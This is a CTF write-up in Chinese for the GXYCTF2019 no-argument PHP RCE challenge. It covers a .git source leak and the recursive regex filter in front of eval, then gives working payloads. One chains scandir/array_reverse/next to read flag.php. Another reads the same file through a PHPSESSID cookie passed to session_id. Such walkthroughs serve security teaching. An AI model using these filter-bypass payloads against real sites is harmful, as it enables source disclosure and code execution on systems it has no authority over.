[GXYCTF2019]禁止套娃（无参数RCE）

目录

信息收集

知识讲解

涉及函数

PHP的正则表达式

无参rce

用到的函数

思路分析

方法一

方法二

---

信息收集

拿到这道题，抓包看了看，啥也没有，用dirsearch爆破目录发现.git目录，猜测存在.git源码泄露，用githack探测发现有index.php这个文件，原来是./git源码泄露

githack探测后拿到index.php

源码如下

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

知识讲解

涉及函数

PHP中preg_match（/{1\2\3...}/i,{}）

preg_match 函数用于执行一个正则表达式匹配
/u 表示按unicode(utf-8)匹配（主要针对多字节比如汉字）
/i 表示不区分大小写（如果表达式里面有a，那么A也是匹配对象）
/s 表示将字符串视为单行来匹配

PHP preg_replace() 函数

preg_replace 函数执行一个正则表达式的搜索和替换。

PHP的正则表达式

无参rce

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']))
{
    eval($_GET['code']);
}

这段代码的核心就是只允许函数而不允许函数中的参数，就是说传进去的值是一个字符串接一个()，那么这个字符串就会被替换为空，如果替换后只剩下;，那么这段代码就会被eval执行。而且因为这个正则表达式是递归调用的，所以说像a(b(c()));第一次匹配后就还剩

下a(b());，第二次匹配后就还剩a();，第三次匹配后就还剩;了，所以说这一串a(b(c()))，就会被eval执行，但相反，像a(b('111'));这种存在参数的就不行，因为无论正则匹配多少次它的参数总是存在的。那假如遇到这种情况，我们就只能使用没有参数的php函数

这里如果觉得比较抽象我们可以本地搭建个匹配进行验证分析，如下

<?php
$a = 'b(a_());';
if (';' === preg_replace('/[a-z,_]+\((?R)?\)/',NULL,$a))
    echo 'ok';
highlight_file(__FILE__);
?>

当a_存在参数时echo不执行，另外由于没有匹配数字，出现数字也会不执行，如'b(a1_());'

用到的函数

localeconv() 返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
current() 返回数组中的当前单元, 默认取第一个值
scandir() 可以扫描当前目录下的文件
array_reverse() 以相反的元素顺序返回数组
next() 将内部指针指向数组的下一个元素，并返回结果

current(localeconv())永远都是个点

思路分析

方法一

先读取当前的目录

?exp=print_r(scandir(current(localeconv())));

发现一个flag.php

目录取反

?exp=print_r(array_reverse(scandir(current(localeconv()))));

指向下一个元素

?exp=print_r(next(array_reverse(scandir(current(localeconv())))));

读取文件

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

方法二

session_id()实现任意文件读取

session_id可以获取PHPSESSID的值，而我们知道PHPSESSID允许字母和数字出现，而flag.php符合条件
因此我们在请求包中cookie:PHPSESSID=flag.php,使用session之前需要通过session_start()告诉PHP使用session，php默认是不主动使用session的。
session_id()可以获取到当前的session id。
这样可以构造payload:?exp=readfile(session_id(session_start()));
达到任意文件读取的效果

先用cookie传参来设置session_id的值，session_id的值等于cookie中PHPSESSID的值，所以构建cookie头

Cookie: PHPSESSID=flag.php

在PHP中，session通常不会手动开启，需要利用php函数session_start来开启，所以可以构造payload

?exp=show_source(session_id(session_start()));